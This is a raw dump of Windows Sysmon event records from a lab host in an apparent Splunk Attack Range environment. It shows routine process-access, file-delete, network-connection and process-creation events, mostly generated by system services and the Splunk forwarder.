21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127717Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127716Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127715Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127714Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127713Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127712Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127711Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127710Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127709Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127708Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127707Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:18.192{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035127737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:19.876{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55802C9DE50AD9813D87AB5299AD4792,SHA256=5A983ED71BC7DB2C50186FDCD75E7321B930048B4E2AB63ADEA21522D5BCAAA0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:20.891{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3E6F75DD215FAC995C44A8FDD5CBF96,SHA256=5EACAE41F4280A65897D7176B7DDBA36F0A4ACD6877EBB4EEF537C831DDEBCFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:20.211{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=264E7DE0B1312AD26AEE63EC6D8D12E2,SHA256=5BCE9D4FA89C3E97F57FA3727BF5B293FFF9518937C5DB033BB341C52F098C84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:21.909{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07666B00D6E125841C6E8DB2A4360377,SHA256=2570FCD527461F87EA0635F3BD63D4FADF6BEC569DF25BE4D2EECBAEF590B68F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:45.287{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62067-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035127740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:45.224{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62066-false10.0.1.12-8000- 23542300x800000000000000035127743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:22.911{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=142E8D0798F3F1712985B739D09296F0,SHA256=CE1CCCA7432C1BDB4731AEF2C58980E890D7EA58F967834CDDCC48D701DA60A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:23.926{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F24674799406255C259E6FE2312EDED,SHA256=397BB030FA0597A3F5DCB2F22E5443CD1B5BF22D2B476855C4498CEC3AD21D39,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:24.929{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AA44FE51319B54CADE9B8BF90097C9B,SHA256=3673945AF63E8410783891005B6B619360FF2384542798F00166BE6A24866666,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:50.368{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62068-false10.0.1.12-8000- 23542300x800000000000000035127746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:25.960{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45D552A4BEA5FC9D24F77482279B916F,SHA256=193C5C3C8FE716C04E2AF2773D16FFF998E5574B7340CA83CBFB508E0BA62761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82CE-613A-B896-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-82CE-613A-B896-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.890{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-82CE-613A-B896-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.875{B81B27B7-82CE-613A-B896-03000000C801}612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:26.144{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=96AC18925D89ECB6FF99413C2379C5DE,SHA256=1313A03AAE7DB3CB22F83B37D11ACBB08E5A995BB4E0699585FC26733A988E48,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F200829711ED079153C0D4ECB4D0E0E,SHA256=9E181F755E22723614FD73E1CB0320CDF9F8D7753E4B9D46B7400643DEF049B8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.889{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5063A273BCC94106F69C41A4CA9144E9,SHA256=416E64EB55E148C1246D69B5516AE38909BD7B954DE1A82CB485EAA08D94B118,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-82CF-613A-B996-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:55:27.590{B81B27B7-4012-611D-0C00-00000000C801}7326504C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 